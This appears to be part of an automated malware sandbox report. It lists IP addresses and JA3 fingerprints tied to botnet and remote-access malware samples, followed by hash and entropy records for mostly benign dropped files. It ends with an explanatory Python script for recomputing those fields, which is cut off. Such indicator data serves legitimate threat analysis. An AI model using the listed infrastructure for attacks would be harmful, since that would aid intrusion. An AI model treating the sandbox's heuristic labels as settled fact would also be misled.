| SGGS-AS-APSGGSSG | teste.x86.elf | malicious | Mirai, Moobot, Okiru | 103.14.247.60 |
| SGGS-AS-APSGGSSG | na.elf | malicious | Gafgyt | 103.14.247.29 |

Context: JA3 fingerprints

| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 3b5074b1b5d032e5620f69f9f700ff0e | StGx54oFh6.exe | malicious | Quasar | 107.161.23.150 |
| 3b5074b1b5d032e5620f69f9f700ff0e | 8iAcoQLc3o.ps1 | malicious | Unknown | 107.161.23.150 |
| 3b5074b1b5d032e5620f69f9f700ff0e | R7FBVcp1tf.ps1 | malicious | Unknown | 107.161.23.150 |
| 3b5074b1b5d032e5620f69f9f700ff0e | 2rTi9MgX25.ps1 | malicious | Unknown | 107.161.23.150 |
| 3b5074b1b5d032e5620f69f9f700ff0e | fs8cRx6Us2.ps1 | malicious | Unknown | 107.161.23.150 |
| 3b5074b1b5d032e5620f69f9f700ff0e | 1AqzGcCKey.exe | malicious | Quasar | 107.161.23.150 |
| 3b5074b1b5d032e5620f69f9f700ff0e | v4BET4inNV.vbs | malicious | GuLoader | 107.161.23.150 |
| 3b5074b1b5d032e5620f69f9f700ff0e | ER4HMMzeQ3.ps1 | malicious | Unknown | 107.161.23.150 |
| 3b5074b1b5d032e5620f69f9f700ff0e | BJtvb5Vdhh.exe | malicious | Quasar | 107.161.23.150 |
| 3b5074b1b5d032e5620f69f9f700ff0e | HquJT7q6xG.exe | malicious | Quasar | 107.161.23.150 |

Context: Dropped files

No context.
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.7067158311765371
Encrypted: false
SSDEEP: 1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vq0:2JIB/wUKUKQncEmYRTwh0kee
MD5: CC4CD535163BC5A162AD8549A39DF532
SHA1: F922D8634D7C93A4CCFF9CD30FA9AFE6F4BCF311
SHA-256: 9C0F8D0A096D90D7CB76F26DA55F78543DDFB615442317BF9173A0EB592939A7
SHA-512: CA250BFFEACD593B6BB3BB6CC01D42BE3CCEA9823253D302EADC4AA94056DB21330EF44206210E28F778A1A09B377D7F5FB2EDACB0E9428E4D269E31F095FDC6
Malicious: false
Reputation: low
Preview: ...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0xdcfad596, page size 16384, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.790047221763226
Encrypted: false
SSDEEP: 1536:7SB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:7azaPvgurTd42UgSii
MD5: 7B5287633C0C5C48CCE92F3A3B811397
SHA1: 52A879757D2B13798C675D24E4A5BB8E77DEC618
SHA-256: C086D1047B941725CB4328B03AB6406738DE3DDAE3539F8E50DA1BF4CD5C0A56
SHA-512: C0B90E51962CE9DAA17CE43C570D93AC7BDF173C7EC6E66EBF5CACA9C06C29AD241DE84A9242E5CA8DC9A000845C7A4F51512B4A0F69597E6557D4431F6C891F
Malicious: false
Reputation: low
Preview: ...... ...............X\...;...{......................0.`.....42...{5..0...|s.h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{..................................,.)..0...|...................H..0...|s..........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 16384
Entropy (8bit): 0.08269710107324885
Encrypted: false
SSDEEP: 3:arGEYeJB2zvNt/57Dek3JetWpEtAllEqW3l/TjzzQ/t:aSEzJB2zvPR3tetWStAmd8/
MD5: C8B73CA26D806B3E1D6147D5A66F609E
SHA1: 73386D3F99DA085F6CAD56EEA344E4F303EFDEDF
SHA-256: 6A2ADBC504A63BBDB9825CEDC937A707BC80D3495FA2C3B92A3E531E734E6296
SHA-512: 356681009BA76A9B33BA49FA2B1A6B20F9EADF865A5CFB83F1C0A77A7BA41A64A4F8EAA5C0F318FA4DE5683BB8013CF8DC7A64E5359C8F13EB67AC521308BC7B
Malicious: false
Preview: ..w......................................;...{...0...|s.42...{5.........42...{5.42...{5...Y.42...{59.................H..0...|s.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):300
                                                                                          Entropy (8bit):5.301775254510903
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:7DXV+q2PcNwi2nKuAl9OmbnIFUt8OD6Zmw+ODWVkwOcNwi2nKuAl9OmbjLJ:7DXgvLZHAahFUt8OD6/+ODG54ZHAaSJ
                                                                                          MD5:40934D63C7F51F8B9F07BE7BECE51DC5
                                                                                          SHA1:AA9D0E770781F17999D3C0538A7725DC00E9B6AF
                                                                                          SHA-256:95D86CE2047E7D845BFF0CDADBCA7C5269FDCD1FBBAFE5E8582F83060004AB94
                                                                                          SHA-512:AA2F57EAF936B970C748626C5025FE07BCE0D14CD2F759AB25CCE3AAF1E01CCC83DB626A87239EF857DE2A336803FA108F8D76CA6BE2D8D97E3458AB6742DE14
                                                                                          Malicious:false
                                                                                          Preview:2024/12/19-06:48:27.385 1668 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:48:27.388 1668 Recovering log #3.2024/12/19-06:48:27.388 1668 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):300
                                                                                          Entropy (8bit):5.301775254510903
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:7DXV+q2PcNwi2nKuAl9OmbnIFUt8OD6Zmw+ODWVkwOcNwi2nKuAl9OmbjLJ:7DXgvLZHAahFUt8OD6/+ODG54ZHAaSJ
                                                                                          MD5:40934D63C7F51F8B9F07BE7BECE51DC5
                                                                                          SHA1:AA9D0E770781F17999D3C0538A7725DC00E9B6AF
                                                                                          SHA-256:95D86CE2047E7D845BFF0CDADBCA7C5269FDCD1FBBAFE5E8582F83060004AB94
                                                                                          SHA-512:AA2F57EAF936B970C748626C5025FE07BCE0D14CD2F759AB25CCE3AAF1E01CCC83DB626A87239EF857DE2A336803FA108F8D76CA6BE2D8D97E3458AB6742DE14
                                                                                          Malicious:false
                                                                                          Preview:2024/12/19-06:48:27.385 1668 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:48:27.388 1668 Recovering log #3.2024/12/19-06:48:27.388 1668 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):341
                                                                                          Entropy (8bit):5.27639858262341
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:7DRqHN+q2PcNwi2nKuAl9Ombzo2jMGIFUt8OD2/Zmw+OD2wtVkwOcNwi2nKuAl97:7DRqovLZHAa8uFUt8OD2//+OD2k54ZHA
                                                                                          MD5:9D61F8545AF42BF72753C890FB8684FD
                                                                                          SHA1:3C96E10D77A7F974938FB82A4AB070D6F8B4EAAF
                                                                                          SHA-256:D7D1F125937868AB6CF857F70C567D1BF4CFC7AF5E16D8CE14F370F55BED20AA
                                                                                          SHA-512:E5395E8D8596A2F2F9A1F356AF00B16BCDBDD6A4168BB065DF73C9440357798BAC7A5EDED765622680A9F0AAEBB2B0CEE0DA165F0C30CB1CAFF1C07AC4001139
                                                                                          Malicious:false
                                                                                          Preview:2024/12/19-06:48:27.632 548 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:48:27.643 548 Recovering log #3.2024/12/19-06:48:27.644 548 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):341
                                                                                          Entropy (8bit):5.27639858262341
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:7DRqHN+q2PcNwi2nKuAl9Ombzo2jMGIFUt8OD2/Zmw+OD2wtVkwOcNwi2nKuAl97:7DRqovLZHAa8uFUt8OD2//+OD2k54ZHA
                                                                                          MD5:9D61F8545AF42BF72753C890FB8684FD
                                                                                          SHA1:3C96E10D77A7F974938FB82A4AB070D6F8B4EAAF
                                                                                          SHA-256:D7D1F125937868AB6CF857F70C567D1BF4CFC7AF5E16D8CE14F370F55BED20AA
                                                                                          SHA-512:E5395E8D8596A2F2F9A1F356AF00B16BCDBDD6A4168BB065DF73C9440357798BAC7A5EDED765622680A9F0AAEBB2B0CEE0DA165F0C30CB1CAFF1C07AC4001139
                                                                                          Malicious:false
                                                                                          Preview:2024/12/19-06:48:27.632 548 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:48:27.643 548 Recovering log #3.2024/12/19-06:48:27.644 548 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:JSON data
                                                                                          Category:modified
                                                                                          Size (bytes):475
                                                                                          Entropy (8bit):4.959716522192626
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:YH/um3RA8sq+iEsBdOg2H9qcaq3QYiubSpDyP7E4TX:Y2sRdsMdMHj3QYhbSpDa7n7
                                                                                          MD5:34873D997EE9622190D0E14911FDB470
                                                                                          SHA1:21C4A7DB6C54D676C8A6A3674410E441575ABB6A
                                                                                          SHA-256:63AC24AF283639F1E3DA757DC7545F794BCBB1254C9B63FA929336D270C59C2E
                                                                                          SHA-512:76435A4CCABC06CAE9EEDB220EAEBA14659A9E8125ECBFDE1EEAAB4906D293C258BF665C5648B532C6491E33BF927CA5A68C685D46C650E48AA7D77A9AA7226C
                                                                                          Malicious:false
                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379168919724318","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":639828},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):475
                                                                                          Entropy (8bit):4.959716522192626
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:YH/um3RA8sq+iEsBdOg2H9qcaq3QYiubSpDyP7E4TX:Y2sRdsMdMHj3QYhbSpDa7n7
                                                                                          MD5:34873D997EE9622190D0E14911FDB470
                                                                                          SHA1:21C4A7DB6C54D676C8A6A3674410E441575ABB6A
                                                                                          SHA-256:63AC24AF283639F1E3DA757DC7545F794BCBB1254C9B63FA929336D270C59C2E
                                                                                          SHA-512:76435A4CCABC06CAE9EEDB220EAEBA14659A9E8125ECBFDE1EEAAB4906D293C258BF665C5648B532C6491E33BF927CA5A68C685D46C650E48AA7D77A9AA7226C
                                                                                          Malicious:false
                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379168919724318","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":639828},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):4099
                                                                                          Entropy (8bit):5.235348769409317
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtPfttfldYg:CwNw1GHqPySfkcigoO3h28ytPffldp
                                                                                          MD5:B1EEB9E43F4D1BA9CBAA7D501084D842
                                                                                          SHA1:E980A86F78B5FF197F3311534A5FD60D02E8835D
                                                                                          SHA-256:AFC5D559979308B37881D07E0E8596F037EC81420632B2F6E671065E0CA07C91
                                                                                          SHA-512:1E27A0F85CF8AF941D07BDDB98C6A2804BE3D4A0D8EC76D2DC639E7010FE7F4F200FD004B4B79B8BCAAEBE75B07997B399568A4B5698FB5C5ACF9177C53B0939
                                                                                          Malicious:false
                                                                                          Preview:*...#................version.1..namespace-.aw.o................next-map-id.1.Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.0I.$.r................next-map-id.2.Snamespace-9a9aa6d6_c307_4dda_b6c0_dc91084c8e68-https://rna-v2-resource.acrobat.com/.1!...r................next-map-id.3.Snamespace-1fbd9dc5_70a3_4975_91b4_966e0915c27a-https://rna-v2-resource.acrobat.com/.2..N.o................next-map-id.4.Pnamespace-0e0aed8d_6d6f_4be0_b28f_8e02158bc792-https://rna-resource.acrobat.com/.3*.z.o................next-map-id.5.Pnamespace-52652c26_09c2_43f2_adf7_da56a1f00d32-https://rna-resource.acrobat.com/.4.{.^...............Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.C..r................next-map-id.6.Snamespace-3a89c6b0_72b9_411a_9e44_fa247f34ac91-https://rna-v2-resource.acrobat.com/.5.q._r................next-map-id.7.Snamespace-02b23955_9103_42e0_ba64_3f8683969652-https://rna-v2-resource.acrobat.com/.6..d.o..............
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):329
                                                                                          Entropy (8bit):5.283207927324686
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:7Dx3+q2PcNwi2nKuAl9OmbzNMxIFUt8OD3Zmw+ODXVkwOcNwi2nKuAl9OmbzNMFd:7DsvLZHAa8jFUt8OD3/+ODl54ZHAa84J
                                                                                          MD5:C7FDEFBA326B210E9985D5399B253BB7
                                                                                          SHA1:604A8D1118942CA67E2DB4D8421B1FEA5D415E95
                                                                                          SHA-256:04BC2333A5E7D8F3841D477D03EC7DC5938CFB883734B9AAC70B5057D0946055
                                                                                          SHA-512:7EA3217EEBBD49C3516704942BAB6797902EFAF214CE257D78C53FDFB6EF132B5C5390A19D94011F249B796CB2CF0BB8DCDBB386B869BAF6CCCEBECECDAB3BB8
                                                                                          Malicious:false
                                                                                          Preview:2024/12/19-06:48:27.813 548 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:48:27.815 548 Recovering log #3.2024/12/19-06:48:27.815 548 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):329
                                                                                          Entropy (8bit):5.283207927324686
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:7Dx3+q2PcNwi2nKuAl9OmbzNMxIFUt8OD3Zmw+ODXVkwOcNwi2nKuAl9OmbzNMFd:7DsvLZHAa8jFUt8OD3/+ODl54ZHAa84J
                                                                                          MD5:C7FDEFBA326B210E9985D5399B253BB7
                                                                                          SHA1:604A8D1118942CA67E2DB4D8421B1FEA5D415E95
                                                                                          SHA-256:04BC2333A5E7D8F3841D477D03EC7DC5938CFB883734B9AAC70B5057D0946055
                                                                                          SHA-512:7EA3217EEBBD49C3516704942BAB6797902EFAF214CE257D78C53FDFB6EF132B5C5390A19D94011F249B796CB2CF0BB8DCDBB386B869BAF6CCCEBECECDAB3BB8
                                                                                          Malicious:false
                                                                                          Preview:2024/12/19-06:48:27.813 548 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:48:27.815 548 Recovering log #3.2024/12/19-06:48:27.815 548 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                          Category:dropped
                                                                                          Size (bytes):65110
                                                                                          Entropy (8bit):0.6376462682686903
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:Fn1AGmY2nTLKnzN4lu1/4uy47rHMMMxAz:FsY2XQzyQnuc
                                                                                          MD5:1468EB269F45D6EECE72317AF6B1587F
                                                                                          SHA1:AB52469CD54F341F71D8EEA78E5293C597CC2560
                                                                                          SHA-256:56B0D18154217AEBE5F78DAA5DAF7861967BB4B615B7D1FFCDBC3C98C8834393
                                                                                          SHA-512:FFEF2EC31529E6165D9549A150FC8DA65917002B81A8E4747853AC7F51D88B3AC545862D5EB39684064EE600140C9D0BDAA97D14067C01AA24B17419950781FA
                                                                                          Malicious:false
                                                                                          Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                                          Category:dropped
                                                                                          Size (bytes):86016
                                                                                          Entropy (8bit):4.439148814605528
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:yeaci5GEiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:1IurVgazUpUTTGt
                                                                                          MD5:7F84EB44602256F376F2FAC70758A24A
                                                                                          SHA1:5740CDAE35F767B3E730A021EAF977CA8A057D09
                                                                                          SHA-256:4676998A230CD4FF21E6768E38C6CBD759EC6D4F8716D0171F12C6EF89DCCB6C
                                                                                          SHA-512:51D310ADAD2D7861FBF7ACAB8DC4198F3A896EE7736515D33F9F076019181A317DC94E36F277928EF5652A461AA282ABC7BBA27FB2A3253B76F57A9C8BFBCD42
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:SQLite Rollback Journal
                                                                                          Category:dropped
                                                                                          Size (bytes):8720
                                                                                          Entropy (8bit):3.778369027307157
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:7MLp/E2ioyV1Rioy3DoWoy1CABoy1iaKOioy1noy1AYoy1Wioy1hioybioysOoyZ:7Ipju1R0iAmSXKQJMvb9IVXEBodRBk1
                                                                                          MD5:655E20125EA8B99AB5C974DC2840AF33
                                                                                          SHA1:E39C908CDBB69F7A25FF39B24AD3BA15CCC89C0A
                                                                                          SHA-256:22653ABAA3B172135F1FDF7E5B22315E6B654D67119F63BDDC51166381A96752
                                                                                          SHA-512:3B2EE99D33F81738113D11A36756C0FB71061F61F0E538782658002811C716F71D8CC82498842668EEBD57F1A50249C1FF005EF9C80931EF3395B782E88FD88D
                                                                                          Malicious:false
                                                                                          Preview:.... .c.....>.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:Certificate, Version=3
                                                                                          Category:dropped
                                                                                          Size (bytes):1391
                                                                                          Entropy (8bit):7.705940075877404
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                          MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                          SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                          SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                          SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                          Malicious:false
                                                                                          Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                          Category:dropped
                                                                                          Size (bytes):71954
                                                                                          Entropy (8bit):7.996617769952133
                                                                                          Encrypted:true
                                                                                          SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                          MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                          SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                          SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                          SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                          Malicious:false
                                                                                          Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):192
                                                                                          Entropy (8bit):2.746484906506307
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:kkFklnQ4+k31fllXlE/HT8kpGlrtNNX8RolJuRdxLlGB9lQRYwpDdt:kKH4bmT8gy3NMa8RdWBwRd
                                                                                          MD5:D248FC71690999A67AD27323F9CA02A9
                                                                                          SHA1:C6C205ED560AF1DCDBBF709BE48746DFD96269F1
                                                                                          SHA-256:4AA11F5340E8638514580C661177C62B4045A8ACFABB0685BB76650E9582ABEB
                                                                                          SHA-512:F083AE317E67280F28DE2F85830DE8825379A672EC57EABE7F30FE608DCD5FD28A0B3F17B7162AB7EE096E4E9AA5DEA3605CB6CCCF4971AD9FA89F5AB2737016
                                                                                          Malicious:false
                                                                                          Preview:p...... ..........h..R..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:data
                                                                                          Category:modified
                                                                                          Size (bytes):328
                                                                                          Entropy (8bit):3.1501841598665044
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:kKSLD9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:rDnLNkPlE99SNxAhUe/3
                                                                                          MD5:0CB964713C05DA622DA4DFA697B33048
                                                                                          SHA1:8F47C4350F16BCF16A79B8EC0A2F47F5D0C32685
                                                                                          SHA-256:A4A6677BF1D00821219FD5790EE96612B26F0FF8D26E583D8A1A989189EB02EF
                                                                                          SHA-512:FD1CDADF6455272037B8F33A347A97D844582468F2297B4ED5B56E7E059DB580FE902686CC019CC11AED78B1AA7F3223DF201484F13F43332853428029FAA8ED
                                                                                          Malicious:false
                                                                                          Preview:p...... .........g`..R..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
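The AcroCEF.exe entries above are Windows certificate-chain housekeeping rather than sample activity: a DER certificate (ISRG Root X1), the authroot.stl certificate trust list CAB, and two CryptnetUrlCache metadata blobs whose previews show the fetched URLs as "h.t.t.p.:././..." because they are stored as UTF-16LE. The script below is an added example, not Joe Sandbox code, that re-derives the per-file fields an entry reports (Size, Entropy (8bit), Encrypted, MD5/SHA1/SHA-256/SHA-512), checks a file recovered from the VM against the hashes an entry lists, and pulls the UTF-16LE URLs out of such a metadata blob. The entropy threshold behind "Encrypted" is not stated on the page; 7.9 separates the two values shown (7.9966 true, 7.7059 false) but is an assumption, as are the function names and the constructed sample blob. SSDEEP is left out because it needs a third-party package.

```python
"""Re-derive sandbox dropped-file fields and extract UTF-16LE URLs from a
CryptnetUrlCache metadata blob. Added example; not Joe Sandbox code."""
import hashlib
import math
import re
from collections import Counter

# ASSUMPTION: the page does not state the rule behind "Encrypted:true/false".
# 7.9 reproduces the two values shown (7.9966 -> true, 7.7059 -> false).
ENCRYPTED_ENTROPY_THRESHOLD = 7.9

# CryptnetUrlCache stores the fetched URL as UTF-16LE, hence the
# "h.t.t.p.:././" look of the report preview (every other byte is NUL).
URL_RE = re.compile(r"https?://[\w.\-/:?#&=%~+]+")


def shannon_entropy_8bit(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 (all bytes identical) up to 8.0 (uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def file_metadata(data: bytes, threshold: float = ENCRYPTED_ENTROPY_THRESHOLD) -> dict:
    """Same fields as a report entry; hashes upper-cased as the report prints them."""
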